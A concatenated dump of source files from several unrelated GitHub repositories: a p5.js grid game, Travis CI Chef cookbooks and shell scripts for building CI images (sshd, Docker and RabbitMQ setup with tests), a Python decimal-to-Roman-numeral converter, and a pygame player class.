addButton2 = Button(root, text="Print", command = Print )
addButton2.place(x=0, y= 220, width=300, height=35)
addButton3 = Button(root, text="Check graph for bipartiteness", command = dll.work )
addButton3.place(x=0, y= 255, width=300, height=35)
root.mainloop()
|
9f5f61fc0fff3b3a1a97877269d02472f7aa1882
|
[
"Markdown",
"Python"
] | 2
|
Markdown
|
l0ki69/bipartite_count_.py
|
2c746becab2b530e0751d5a6cf2885c4a68e9680
|
d75752dbe46a7e57d714122caa11a670db101c4d
|
refs/heads/master
|
<file_sep>function keyReleased() {
if (keyCode === 101) guy.inv = false;
}
function keyPressed() {
//WASD
/*
if(key === "W") guy.move(-scl, 1);
if(key === "A") guy.move(-scl, 0);
if(key === "S") guy.move(scl, 1);
if(key === "D") guy.move(scl, 0);
*/
//Arrows
/*
if(keyCode === UP_ARROW) guy.move(-scl, 1);
if(keyCode === LEFT_ARROW) guy.move(-scl, 0);
if(keyCode === DOWN_ARROW) guy.move(scl, 1);
if(keyCode === RIGHT_ARROW) guy.move(scl, 0);
*/
//Numpad
///*
if (keyCode === 97) guy.move(-scl, 3); //1
if (keyCode === 98) guy.move(scl, 1); //2
if (keyCode === 99) guy.move(scl, 2); //3
if (keyCode === 100) guy.move(-scl, 0); //4
if (keyCode === 102) guy.move(scl, 0); //6
if (keyCode === 103) guy.move(-scl, 2); //7
if (keyCode === 104) guy.move(-scl, 1); //8
if (keyCode === 105) guy.move(scl, 3); //9
//*/
//test
///*
if (keyCode === 101) guy.inv = true; //Numpad5
if (key === " ") secretRoom = ~secretRoom; //spacebar
}
<file_sep>function Guy(xg, yg, ig) {
this.HPm = 20;
this.HP = this.HPm;
this.x = xg;
this.y = yg;
this.inv = false;
this.lvl = ig;
this.e = true;
//var hp0 = e.allys;
//this.hp = hp0[0].health;
/*punti*/ //vedi Grafici\RectReference.PNG (Windows)
this.A = createVector(xg, yg);
this.B = createVector(xg + scl, yg);
this.C = createVector(xg, yg + scl);
this.D = createVector(xg + scl, yg + scl);
/*punti*/
this.move = function(dir, axis) {
//axis = 0 --> x / axis = 1 --> y
var c = axis;
switch (c) {
case 0:
this.x += dir;
break;
case 1:
this.y += dir;
break;
case 2:
this.x += dir;
this.y += dir;
break;
case 3:
this.x += dir;
this.y -= dir;
break;
}
}
this.spawn = function() {
this.A = createVector(this.x, this.y);
this.B = createVector(this.x + scl, this.y);
this.C = createVector(this.x, this.y + scl);
this.D = createVector(this.x + scl, this.y + scl);
if (this.e) {
if (this.inv) {
if (secretRoom) fill(255, 10, 100);
else fill(60);
} else fill(255);
rect(this.x, this.y, scl, scl);
this.x = constrain(this.x, 0, roomW - scl);
this.y = constrain(this.y, 0, roomH - scl);
}
}
this.death = function() {
score = 0;
secretRoom = false;
alert("Sei morto! :(");
this.x = xg;
this.y = yg;
}
this.lvlup = function() {
if (this.lvl >= 0 && this.lvl <= 4) this.lvl++;
}
this.shoot = function(dir) {
this.shots = [];
}
}
<file_sep>function fantoccioEnemy(xfe, yfe, ife) {
this.x = xfe;
this.y = yfe;
this.inv = ife;
this.spawn = function() {
if (this.inv) fill(60);
else fill(255, 0, 0);
rect(this.x, this.y, scl, scl);
}
}
function fantoccioGuy(xfg, yfg, ifg) {
this.x = xfg;
this.y = yfg;
this.inv = ifg;
this.spawn = function() {
if (this.inv) fill(60);
else fill(255);
rect(this.x, this.y, scl, scl);
}
}
<file_sep>function Enemy(ie) {
this.shoot = function() {
var c = this.scan();
var xs = this.x;
var ys = this.y;
var xsSpd = 0;
var ysSpd = 0;
if (c !== 0) {
fill(0, 255, 0);
ellipse(xs, ys, 13, 13)
if (c === 1) xs += scl;
if (c === 2) xs -= scl;
if (c === 3) ys += scl;
if (c === 4) ys -= scl;
}
}
this.scan = function() {
if (this.x === guy.x) {
if (this.y < guy.y) return 1; //RIGHT
else if (this.y > guy.y) return 2; //LEFT
} else if (this.y === guy.y) {
if (this.x < guy.x) return 3; //DOWN
else if (this.x > guy.x) return 4; //UP
} else return 0;
}
this.spawn = function() {
this.x = Math.floor(random(cols)) * scl;
this.y = Math.floor(random(rows)) * scl;
this.e = true;
this.inv = ie;
}
this.death = function() {
this.e = false;
score++;
}
this.view = function() {
if (this.e) {
if (this.inv) fill(60);
else fill(255, 0, 0);
rect(this.x, this.y, scl, scl);
}
if (this.x === guy.x && this.y === guy.y) guy.death();
this.x = constrain(this.x, 0, roomW - scl);
this.y = constrain(this.y, 0, roomH - scl);
}
}
<file_sep>//canvas infos
var scl = 20;
var roomH = 600;
var roomW = 600;
var barH = 2 * scl;
var canvasH = roomH + barH;
var canvasW = 600;
var score = 0;
var secretRoom = false;
var cols = Math.floor(roomW / scl);
var rows = Math.floor(roomH / scl);
//JSON files
var EntityTypes;
var Enchantments;
var Items;
//objects
var guy;
var e1;
var lbguy;
//objects arrays
var lifebar = [];
function preload() {
EntityTypes = loadJSON('EntityTypes.json');
Items = loadJSON('Items.json');
Enchantments = loadJSON('Enchantments.json');
}
function setup() {
createCanvas(canvasW, canvasH);
guy = new Guy(1 * scl, roomH / 2, false);
e1 = new Enemy(false);
do {
e1.spawn();
} while (guy.y == e1.y && guy.x == e1.x);
}
function draw() {
for (var i = 0; i < guy.HPm; i++) {
var lifecolor;
var j = i + 1;
var roba = new lifecontainer();
if (j <= guy.HP) {
var R = 255;
var G = 180;
var B = 0;
} else {
var R = 255;
var G = 255;
var B = 255;
}
var X = scl / 2 + i * scl;
var Y = roomH + scl / 2;
roba.show(X, Y, R, G, B);
lifebar[i] = roba;
}
if (secretRoom) background(255, 0, 100);
else background(51);
fill(25);
rect(0, roomH, canvasW, barH);
guy.spawn();
e1.view();
var fscan = e1.scan();
e1.shoot(fscan);
}
<file_sep>function lifecontainer() {
this.show = function(XHP, YHP, RHP, GHP, BHP) {
this.x = XHP;
this.y = YHP;
fill(RHP, GHP, BHP);
rect(XHP, YHP, scl, scl);
}
}
|
eaa2ff7655165f35c13ee2870d91270b773c3eef
|
[
"JavaScript"
] | 6
|
JavaScript
|
emanuele6/TestGame
|
2d37db29bb1c2487e8b48130f3064a9c75174f14
|
ed99e23dfca925d7bc94ec8be4d1c578ef6cecc4
|
refs/heads/master
|
<file_sep># frozen_string_literal: true
if os[:arch] !~ /ppc64/
describe 'riak installation', sudo: true do
before :all do
sh('sudo riak start')
end
describe package('riak') do
it { should be_installed }
end
describe command('riak version') do
its(:stdout) { should match(/^\d/) }
its(:exit_status) { should eq 0 }
end
describe command('sudo riak ping') do
its(:stdout) { should match(/^pong$/) }
end
describe command(
'for n in 0 1 2 3 4 ; do ' \
'sudo riak-admin test || true ; ' \
'echo ; ' \
'sleep 1 ; ' \
'done'
) do
its(:stdout) { should match(%r{^Successfully completed 1 read/write cycle}) }
end
end
end
<file_sep>#!/usr/bin/env bash
set -o errexit
# http://anonscm.debian.org/cgit/pkg-ssh/openssh.git/tree/debian/openssh-server.postinst?id=c77724ca2355dec905cfa1e18930c79e32db2d4e
main() {
: "${ETC_SSH:=/etc/ssh}"
for key in rsa:4096 ecdsa:521 ed25519:256; do
local keytype="${key%%:*}"
local keybits="${key##*:}"
local keyfile="${ETC_SSH}/ssh_host_${keytype}_key"
if [ -f "${keyfile}" ]; then
echo "INFO: '${keytype}' key (${keyfile}) already exists; not regenerating."
continue
fi
echo "INFO: generating '${keytype}' key (${keyfile}); this may take some time..."
ssh-keygen -q -f "${keyfile}" -N '' -t "${keytype}" -b "${keybits}"
ssh-keygen -l -f "${keyfile}.pub"
done
}
main "$@"
<file_sep># frozen_string_literal: true
include_attribute 'travis_internal_base'
override['openssh']['server']['force_command'] = '/usr/sbin/login_duo'
override['openssh']['server']['log_level'] = 'VERBOSE'
override['openssh']['server']['permit_tunnel'] = 'no'
<file_sep>travis_tfw Cookbook
===================
A cookbook for a [tiny floating whale](http://steven-universe.wikia.com/wiki/Tiny_Floating_Whale)!
<file_sep>travis_ci_cookiecat Cookbook
============================
A wrapper cookbook for the "cookiecat" CI image.
<file_sep>#!/usr/bin/env bash
# Chef manages this file on <%= node.name %> <3 <3 <3
set -o errexit
set -o xtrace
main() {
: "${DEVICE:=<%= @device %>}"
: "${METADATA_SIZE:=<%= @metadata_size %>}"
if [[ -e /dev/direct-lvm/metadata ]]; then
echo "$(basename "${0}"): Metadata volume already exists. Assuming set up"
exit 0
fi
pvcreate -y "${DEVICE}"
vgcreate direct-lvm "${DEVICE}"
lvcreate -n metadata direct-lvm --size "${METADATA_SIZE}"
dd if=/dev/zero of=/dev/direct-lvm/metadata bs=1M count=10
lvcreate -n data direct-lvm -l '100%FREE'
dd if=/dev/zero of=/dev/direct-lvm/data bs=1M count=10
}
main "$@"
<file_sep>#!/usr/bin/env bash
set -o errexit
set -o xtrace
export DEBIAN_FRONTEND='noninteractive'
if [[ ${PACKER_BUILDER_TYPE} =~ vmware ]]; then
APT_GET_INSTALL_PRE_CHEF='open-vm-tools'
fi
rm -vf /etc/apt/sources.list.d/partner.list
apt-get update -yqq
apt-get install -yqq \
--no-install-suggests \
--no-install-recommends \
at \
cron \
curl \
git \
sudo \
wget \
${APT_GET_INSTALL_PRE_CHEF}
mkdir -p /tmp/chef-stuff/cookbooks
git clone --branch=v1.3.4 git://github.com/opscode-cookbooks/openssh.git /tmp/chef-stuff/cookbooks/openssh
git clone --branch=v2.7.0 git://github.com/opscode-cookbooks/apt.git /tmp/chef-stuff/cookbooks/apt
git clone --branch=v1.1.6 git://github.com/opscode-cookbooks/chef_handler.git /tmp/chef-stuff/cookbooks/chef_handler
git clone --branch=v2.7.1 git://github.com/opscode-cookbooks/sudo.git /tmp/chef-stuff/cookbooks/sudo
git clone git://github.com/travis-infrastructure/users-cookbook.git /tmp/chef-stuff/cookbooks/users
git clone git://github.com/travis-ci/travis-cookbooks.git /tmp/chef-stuff/travis-cookbooks
git --git-dir=/tmp/chef-stuff/cookbooks/users/.git --work-tree=/tmp/chef-stuff/cookbooks/users checkout 9b807fc8a131383d3b43b9a92a17be7f35520d52
git --git-dir=/tmp/chef-stuff/travis-cookbooks/.git --work-tree=/tmp/chef-stuff/travis-cookbooks checkout 5d4d4dea02071<KEY>
<file_sep># frozen_string_literal: true
override['openssh']['client']['10.*']['strict_host_key_checking'] = 'no'
override['openssh']['client']['10.*']['user_known_hosts_file'] = '/dev/null'
override['openssh']['server']['allow_tcp_forwarding'] = 'no'
override['openssh']['server']['challenge_response_authentication'] = 'no'
override['openssh']['server']['listen_address'] = %w(0.0.0.0:22 [::]:22)
override['openssh']['server']['match']['Host *']['password_authentication'] = 'no'
override['openssh']['server']['match']['Host *']['pubkey_authentication'] = 'yes'
override['openssh']['server']['password_authentication'] = 'no'
override['openssh']['server']['permit_root_login'] = 'no'
override['openssh']['server']['protocol'] = '2'
override['openssh']['server']['pubkey_authentication'] = 'yes'
override['openssh']['server']['kex_algorithms'] = %w[
curve25519-sha256<EMAIL>
diffie-hellman-group-exchange-sha256
].join(',')
override['openssh']['server']['host_key'] = %w[
/etc/ssh/ssh_host_ed25519_key
/etc/ssh/ssh_host_rsa_key
]
override['openssh']['server']['ciphers'] = %w[
chacha20-poly1305@<EMAIL>
<EMAIL>
<EMAIL>
aes256-ctr
aes192-ctr
aes128-ctr
].join(',')
override['openssh']['server']['m_a_cs'] = %w[
hmac-sha2-512-etm<EMAIL>
hmac-sha2-256-etm<EMAIL>
<EMAIL>-ripemd160-et<EMAIL>
<EMAIL>
hmac-sha2-512
hmac-sha2-256
hmac-ripemd160
<EMAIL>
].join(',')
override['travis_sudo']['groups'] = %w[sudo]
<file_sep>travis_ci_connie Cookbook
==========================
A wrapper cookbook for the connie CI image.
<file_sep># frozen_string_literal: true
describe 'sshd configuration' do
describe command('sudo sshd -T') do
its(:stdout) { should include(*EXPECTED_SSHD_CONFIG) }
end
end
EXPECTED_SSHD_CONFIG = <<~EOF.split("\n")
addressfamily any
clientaliveinterval 0
ignorerhosts yes
ignoreuserknownhosts no
kerberosauthentication no
kerberosorlocalpasswd yes
kerberosticketcleanup yes
passwordauthentication no
printmotd yes
strictmodes yes
tcpkeepalive yes
uselogin no
xauthlocation /usr/bin/xauth
EOF
<file_sep># frozen_string_literal: true
override['maven']['install_java'] = false
default['travis_ci_cookiecat']['prerequisite_packages'] = %w[
cron
curl
git
sudo
wget
]
override['travis_phpenv']['prerequisite_recipes'] = []
override['travis_phpbuild']['prerequisite_recipes'] = []
override['travis_perlbrew']['perls'] = []
override['travis_perlbrew']['modules'] = []
override['travis_perlbrew']['prerequisite_packages'] = []
gimme_versions = %w[
1.7.4
]
override['travis_build_environment']['gimme']['versions'] = gimme_versions
override['travis_build_environment']['gimme']['default_version'] = gimme_versions.max
override['travis_build_environment']['pythons'] = []
override['travis_build_environment']['python_aliases'] = {}
override['travis_build_environment']['pip']['packages'] = {}
override['travis_build_environment']['system_python']['pythons'] = []
override['travis_build_environment']['nodejs_default'] = ''
override['travis_build_environment']['nodejs_versions'] = []
override['travis_build_environment']['nodejs_aliases'] = {}
override['travis_build_environment']['nodejs_default_modules'] = []
rubies = %w[
2.2.7
2.4.1
]
override['travis_build_environment']['default_ruby'] = rubies.max
override['travis_build_environment']['rubies'] = rubies
override['travis_build_environment']['php_versions'] = []
override['travis_build_environment']['php_aliases'] = {}
override['travis_build_environment']['otp_releases'] = []
override['travis_build_environment']['elixir_versions'] = []
override['travis_build_environment']['default_elixir_version'] = ''
override['travis_build_environment']['hhvm_enabled'] = false
override['travis_build_environment']['update_hostname'] = false
override['travis_build_environment']['use_tmpfs_for_builds'] = false
override['travis_build_environment']['install_gometalinter_tools'] = false
override['travis_build_environment']['mercurial_install_type'] = 'pip'
override['travis_build_environment']['mercurial_version'] = '4.2.2~trusty1'
override['travis_system_info']['commands_file'] = \
'/var/tmp/cookiecat-system-info-commands.yml'
override['android-sdk']['java_from_system'] = true
override['android-sdk']['owner'] = 'travis'
override['android-sdk']['group'] = 'travis'
override['android-sdk']['license']['default_answer'] = 'y'
override['android-sdk']['scripts']['owner'] = 'travis'
override['android-sdk']['scripts']['group'] = 'travis'
override['travis_java']['default_version'] = 'oraclejdk8'
override['travis_java']['alternate_versions'] = %w[
openjdk7
openjdk8
]
override['leiningen']['home'] = '/home/travis'
override['leiningen']['user'] = 'travis'
override['travis_build_environment']['update_hostname'] = false
override['travis_build_environment']['use_tmpfs_for_builds'] = false
override['travis_packer_templates']['job_board']['stack'] = 'cookiecat'
override['travis_packer_templates']['job_board']['features'] = %w[
basic
disabled-ipv6
docker
docker-compose
jdk
]
override['travis_packer_templates']['job_board']['languages'] = %w[
__cookiecat__
android
]
<file_sep>#!/usr/bin/env bash
set -o errexit
main() {
set -o xtrace
export DEBIAN_FRONTEND=noninteractive
echo 1 >/proc/sys/net/ipv4/ip_forward
echo net.ipv4.ip_forward=1 >>/etc/sysctl.conf
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
apt-get update -yqq
apt-get install -yqq iptables-persistent
}
main "${@}"
<file_sep>travis_ci_garnet Cookbook
=========================
A wrapper cookbook for the "garnet" CI image.
<file_sep># frozen_string_literal: true
require 'support'
def rmq
@rmq ||= Support::RabbitMQAdmin.new
end
describe 'rabbitmq installation' do
before :all do
sh('sudo service rabbitmq-server start')
tcpwait('127.0.0.1', 5672)
sh("#{rmq.exe} declare queue " \
'name=my-test-queue durable=false')
sh("#{rmq.exe} publish exchange=amq.default " \
'routing_key=my-test-queue payload="hello, world"')
sleep 2
end
describe package('rabbitmq-server') do
it { should be_installed }
end
describe 'rabbitmq commands', sudo: true do
if os[:release] !~ /16/
describe command('sudo service rabbitmq-server status') do
its(:stdout) { should match 'running_applications' }
end
else
describe command('sudo service rabbitmq-server status') do
its(:stdout) { should include('active (running)') }
end
end
describe command('sudo rabbitmqctl status') do
its :stdout do
should match(/Status of node '?rabbit@/)
should include('running_applications')
end
end
end
describe 'rabbitmqadmin commands', sudo: true do
describe command("#{rmq.exe} list queues") do
its(:stdout) { should include('my-test-queue') }
end
end
end
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
main() {
: "${ETCDIR:=/etc}"
: "${RUNDIR:=/var/tmp/travis-run.d}"
if [ ! -f "${RUNDIR}/instance-hostname.tmpl" ]; then
echo "Missing ${RUNDIR}/instance-hostname.tmpl"
exit 0
fi
local hosts_line
local instance_hostname
local instance_id
local instance_ipv4
curl -sSL 'http://169.254.169.254/latest/meta-data/instance-id' \
>"${RUNDIR}/instance-id"
instance_id="$(cat "${RUNDIR}/instance-id")"
instance_id="${instance_id:0:9}"
curl -sSL 'http://169.254.169.254/latest/meta-data/local-ipv4' \
>"${RUNDIR}/instance-ipv4"
instance_ipv4="$(cat "${RUNDIR}/instance-ipv4")"
instance_hostname="$(
sed "s/___INSTANCE_ID___/${instance_id}/g" \
"${RUNDIR}/instance-hostname.tmpl"
)"
hosts_line="${instance_ipv4} ${instance_hostname} ${instance_hostname%%.*}"
echo "${instance_hostname}" |
tee "${ETCDIR}/hostname" >"${RUNDIR}/instance-hostname"
hostname -F "${ETCDIR}/hostname"
if ! grep -q "^${hosts_line}" "${ETCDIR}/hosts"; then
echo "${hosts_line}" | tee -a "${ETCDIR}/hosts"
fi
}
main "$@"
<file_sep>travis_ci_amethyst Cookbook
===========================
A wrapper cookbook for the "amethyst" CI image.
<file_sep># frozen_string_literal: true
name 'travis_ci_cookiecat'
maintainer 'Travis CI GmbH'
maintainer_email '<EMAIL>'
license 'MIT'
description 'Installs/Configures travis_ci_cookiecat'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
source_url 'https://github.com/travis-ci/packer-templates'
issues_url 'https://github.com/travis-ci/packer-templates/issues'
depends 'android-sdk'
depends 'openssl'
depends 'travis_build_environment'
depends 'travis_docker'
depends 'travis_java'
depends 'travis_packer_templates'
depends 'travis_sbt_extras'
depends 'travis_system_info'
<file_sep># `travis_internal_bastion` Cookbook
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
main() {
rm -vf "${SUDOERS_D:-/etc/sudoers.d}/travis"
}
main "$@"
<file_sep>#!/usr/bin/env bash
set -o errexit
main() {
DOCKERD=/usr/bin/dockerd
DOCKER_OPTS=
for filename in docker-chef docker-cloud-init docker docker-local; do
if [[ -f "/etc/default/${filename}" ]]; then
# shellcheck source=/dev/null
source "/etc/default/${filename}"
fi
done
if [[ -z "${TRAVIS_DOCKER_DISABLE_DIRECT_LVM}" ]]; then
travis-docker-volume-setup
DOCKER_OPTS="$DOCKER_OPTS --config-file=/etc/docker/daemon-direct-lvm.json"
fi
# shellcheck disable=SC2086
exec "${DOCKERD}" $DOCKER_OPTS --raw-logs
}
main "$@"
<file_sep># frozen_string_literal: true
# Cookbook Name:: travis_tfw
# Recipe:: default
#
# Copyright 2017, Travis CI GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'json'
include_recipe 'travis_internal_base'
include_recipe 'travis_docker'
package %w[
lvm2
xfsprogs
]
template '/usr/local/bin/travis-docker-volume-setup' do
source 'travis-docker-volume-setup.sh.erb'
owner 'root'
group 'root'
mode 0o755
variables(
device: node['travis_tfw']['docker_volume_device'],
metadata_size: node['travis_tfw']['docker_volume_metadata_size']
)
end
cookbook_file '/usr/local/bin/travis-tfw-combined-env' do
owner 'root'
group 'root'
mode 0o755
end
cookbook_file '/usr/local/bin/travis-docker-wrapper' do
owner 'root'
group 'root'
mode 0o755
end
template '/etc/default/docker-chef' do
source 'etc-default-docker-chef.sh.erb'
owner 'root'
group 'root'
mode 0o644
end
file '/etc/default/docker' do
content "# this space intentionally left blank\n"
owner 'root'
group 'root'
mode 0o644
end
daemon_json = {
'graph' => node['travis_tfw']['docker_dir'],
'hosts' => %w[
tcp://127.0.0.1:4243
unix:///var/run/docker.sock
],
'icc' => false,
'userns-remap' => 'default'
}
file '/etc/docker/daemon.json' do
content JSON.pretty_generate(daemon_json) + "\n"
owner 'root'
group 'root'
mode 0o644
end
file '/etc/docker/daemon-direct-lvm.json' do
content JSON.pretty_generate(
daemon_json.merge(
'storage-driver' => 'devicemapper',
'storage-opts' => {
'dm.basesize' => node['travis_tfw']['docker_dm_basesize'],
'dm.datadev' => '/dev/direct-lvm/data',
'dm.metadatadev' => '/dev/direct-lvm/metadata',
'dm.fs' => node['travis_tfw']['docker_dm_fs']
}.to_a.map { |pair| pair.join('=') }
)
) + "\n"
owner 'root'
group 'root'
mode 0o644
end
template '/etc/init/docker.conf' do
source 'etc-init-docker.conf.erb'
owner 'root'
group 'root'
mode 0o644
end
directory '/etc/systemd/system/docker.service.d' do
owner 'root'
group 'root'
mode 0o755
only_if { ::File.directory?('/etc/systemd/system') }
end
template '/etc/systemd/system/docker.service.d/travis.conf' do
source 'etc-systemd-system-docker.service.d-travis.conf.erb'
owner 'root'
group 'root'
mode 0o644
only_if { ::File.directory?('/etc/systemd/system') }
end
service 'docker' do
action %i[enable start]
end
<file_sep># frozen_string_literal: true
name 'travis_internal_base'
maintainer 'Travis CI GmbH'
maintainer_email '<EMAIL>'
license 'MIT'
description 'Installs/Configures travis_internal_base'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
source_url 'https://github.com/travis-ci/packer-templates'
issues_url 'https://github.com/travis-ci/packer-templates/issues'
depends 'apt'
depends 'openssh'
depends 'papertrail'
depends 'travis_sudo'
<file_sep># frozen_string_literal: true
describe user('travis') do
it { should exist }
it { should have_home_directory('/home/travis') }
it 'has an unexpected password' do
# get the encrypted password directly, since serverspec doesn't appear to
# take current uid into account, meaning it doesn't use sudo when it should
encrypted_password = `sudo getent shadow travis | cut -f 2 -d ':'`.strip
salt = encrypted_password.split('$').fetch(2)
re_encrypted = `mkpasswd -m sha-512 travis #{salt}`.strip
expect(encrypted_password).to_not eq(re_encrypted)
end
end
<file_sep># frozen_string_literal: true
module Support
class RabbitMQAdmin
def exe
ensure_available!
dest
end
def ensure_available!
return if dest.exist? && dest.executable?
download_rabbitmqadmin
end
private
def download_rabbitmqadmin
system "curl -sSL -o #{dest} #{url}"
dest.chmod(0o0755)
end
def dest
Pathname.new(
ENV['RABBITMQADMIN_DEST'] || Support.tmpdir.join('rabbitmqadmin')
)
end
def url
ENV['RABBITMQADMIN_URL'] ||
'https://raw.githubusercontent.com/rabbitmq/rabbitmq-management/master/bin/rabbitmqadmin'
end
end
end
<file_sep>#!/usr/bin/env bash
# vim:filetype=sh
set -o errexit
set -o pipefail
main() {
: "${RSYSLOG_PAPERTRAIL_CONF:=/etc/rsyslog.d/65-papertrail.conf}"
: "${SYSLOG_ADDRESS_FILE:=/var/tmp/travis-run.d/syslog-address}"
if [[ ! -f "${SYSLOG_ADDRESS_FILE}" ]]; then
echo "Missing ${SYSLOG_ADDRESS_FILE}"
exit 0
fi
local syslog_address
syslog_address="$(cat "${SYSLOG_ADDRESS_FILE}")"
touch "${RSYSLOG_PAPERTRAIL_CONF}"
sed -i '/^\*\.\*.*@/d' "${RSYSLOG_PAPERTRAIL_CONF}"
echo "*.* @${syslog_address}" >>"${RSYSLOG_PAPERTRAIL_CONF}"
service rsyslog stop || true
service rsyslog start || true
}
main "$@"
<file_sep># `travis_internal_base` Cookbook
<file_sep># frozen_string_literal: true
default['travis_tfw']['docker_environment']['TRAVIS_DOCKER_TFW'] = 'oooOOOoooo'
default['travis_tfw']['docker_volume_device'] = '/dev/xvdc'
default['travis_tfw']['docker_volume_metadata_size'] = '2G'
default['travis_tfw']['docker_dm_basesize'] = '12G'
default['travis_tfw']['docker_dm_fs'] = 'xfs'
default['travis_tfw']['docker_dir'] = '/mnt/docker'
<file_sep># frozen_string_literal: true
require 'support'
include Support::Helpers
describe 'tiny floating whale docker setup', docker: false do
before :all do
sh('sudo service docker start')
end
describe service('docker') do
it { should be_enabled }
it { should be_running }
end
describe package('lvm2') do
it { should be_installed }
end
describe package('xfsprogs') do
it { should be_installed }
end
describe file('/etc/default/docker-chef') do
it { should exist }
its(:content) { should include('Chef manages') }
end
describe file('/etc/default/docker') do
it { should exist }
its(:content) { should include('left blank') }
end
describe file('/etc/init/docker.conf') do
it { should exist }
its(:content) { should include('$TRAVIS_DOCKER_DISABLE_DIRECT_LVM') }
end
end
|
01199a10cc094ac5e5b06e9b584e08dbe05d7e34
|
[
"Markdown",
"Ruby",
"Shell"
] | 28
|
Ruby
|
edmorley/packer-templates
|
9d757c9d9e5f9287ddf86f5234489b5905ab26cb
|
091af8ba15d5e06be21c8a5debe5fc91a0896f0b
|
refs/heads/master
|
<repo_name>fnaquira/portfolio<file_sep>/src/components/Layout.js
import React, { Fragment } from 'react';
import Header from './Header';
import About from './About';
const Layout = props => {
return (
<Fragment>
<Header />
<About />
</Fragment>
);
};
export default Layout;
<file_sep>/src/components/Header.js
import React from 'react';
import Scrollchor from 'react-scrollchor';
import { FaGithub, FaLinkedin, FaDownload } from 'react-icons/fa';
const Header = props => {
return (
<div className="main-menu" id="menu">
<div className="main-img">
<div className="main-content">
<div className="title">
<img
className="name-logo"
src="../../public/name_logo.png"
alt="<NAME>"
/>
<div className="button-bar">
<button className="nav-button">
{' '}
<Scrollchor to="#skills-section" className="nav-link">
Skills
</Scrollchor>{' '}
</button>
<button className="nav-button">
{' '}
<Scrollchor to="#portfolio" className="nav-link">
Portfolio
</Scrollchor>{' '}
</button>
</div>
<div className="icon-bar">
<a
className="social-link github-link"
href="https://github.com/mariastlouis"
>
{' '}
<FaGithub />{' '}
</a>
<a
className="social-button"
href="../../public/mariaSanchezResume.pdf"
download
>
{' '}
<button className="resume-link">
{' '}
RESUME <FaDownload />
</button>{' '}
</a>
<a
className="social-link linkedin-link"
href="https://www.linkedin.com/in/mariastlouissanchez/"
>
{' '}
<FaLinkedin />{' '}
</a>
</div>
</div>
</div>
</div>
</div>
);
};
export default Header;
|
3687eb4e63bba62fa2074b9728c3137adba11b3a
|
[
"JavaScript"
] | 2
|
JavaScript
|
fnaquira/portfolio
|
d2833170c354da24d3f09dda94d9c40daa7cccbb
|
c30408f2cb688ed49c1e1b47a2b67ae7f7b22baa
|
refs/heads/master
|
<file_sep>import math
# Lists of Roman numeral digits
Unidad=["", "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX"]
Decena=["", "X", "XX", "XXX", "XL", "L", "LX", "LXX", "LXXX", "XC"]
Centena=["", "C", "CC", "CCC", "CD", "D", "DC", "DCC", "DCCC", "CM"]
Millar = ["", "M", "MM", "MMM"]
#INPUT
Numero=int(input("Ingresa numero entero\n"))
ind_unidad= Numero % 10
ind_decena=int(math.floor(Numero/10))%10
ind_centena=int(math.floor(Numero/100))%10
ind_millar=int(math.floor(Numero/1000))
if(Numero>=1000):
    print(Millar[ind_millar]+Centena[ind_centena]+Decena[ind_decena]+Unidad[ind_unidad])
elif(Numero>=100):
    print(Centena[ind_centena]+Decena[ind_decena]+Unidad[ind_unidad])
elif(Numero>=10):
print(Decena[ind_decena]+Unidad[ind_unidad])
else:
print(Unidad[Numero])<file_sep>"# Numeros-decimales-a-romanos-con-Python"
"# Numeros-decimales-a-romanos-con-Python"
|
c09878d7a66b61fa0ce43ec71a58aef8448177e7
|
[
"Markdown",
"Python"
] | 2
|
Python
|
MaritoAllen/Numeros-decimales-a-romanos-con-Python
|
ae074559356aab2b13b1a299a940c51aba0709cd
|
c93790ebf7e3c65f05b472110427aa3e12dfb924
|
refs/heads/main
|
<repo_name>FelipeDSR/CyberPY<file_sep>/Player.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Player.py
#
# @brief Arquivo da classe Player
# @section Descrição
# Essa classe é provavelmente a mais importante.
# Ela é responsavel por acionar as ações da Viper, verificar os inputs do jogo
import pygame
from Input import Input
from Actions import Actions
from Configs import *
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
# Instancia da classe Input
self.input = Input(self)
# diz se a Viper esta no ar (caindo)
self.inAir = False
# armazena as animações da Viper
self.actions = Actions()
# a animação atual
self.currentAction = self.actions.run
# a imagem da animação atual
self.image = self.currentAction.image
# mascara de colisão da imagem atual
self.mask = pygame.mask.from_surface(self.image)
# armazena posição na tela e tamanho de um sprite
self.rect = self.image.get_rect()
self.rect[0] = SCREEN_WIDTH / 2 - PLAYER_WIDTH
self.rect[1] = FLOOR
# velocidade vertical
self.speedy = 0
# gravidade
self.gravity = 1
def update(self):
        # gravity is always exerting a force; so that Viper does not fall into the void,
        # her vertical speed is reset to zero once she reaches the floor
self.rect[1] += self.speedy
# verifica se a Viper não está tocando o chão
if self.rect[1] < FLOOR:
# se sim ela está no Ar e a gravidade é exercida sobre ela
self.inAir = True
self.speedy += self.gravity
else:
# se não ela não está no ar e ela para de cair
self.inAir = False
self.speedy = 0
# atualiza a animação atual
